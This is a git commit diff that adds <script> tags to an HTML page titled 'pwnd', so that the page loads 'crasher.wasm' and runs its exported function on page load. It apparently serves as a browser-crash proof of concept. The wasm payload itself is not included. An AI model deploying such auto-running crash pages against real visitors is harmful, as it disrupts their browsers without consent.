Upload files to "/"

This commit is contained in:
toro0t 2024-12-09 00:50:20 +00:00
parent b41e747893
commit 3b6c33403c

View file

@ -2,12 +2,13 @@
<html> <html>
<head>pwnd</head> <head>pwnd</head>
<body> <body>
<script>
fetch("crasher.wasm") fetch("crasher.wasm")
.then((response) => response.arrayBuffer()) .then((response) => response.arrayBuffer())
.then((bytes) => WebAssembly.instantiate(bytes, importObject)) .then((bytes) => WebAssembly.instantiate(bytes, importObject))
.then((results) => { .then((results) => {
results.instance.exports.exported_func(); results.instance.exports.exported_func();
}); });
</script>
</body> </body>
</html> </html>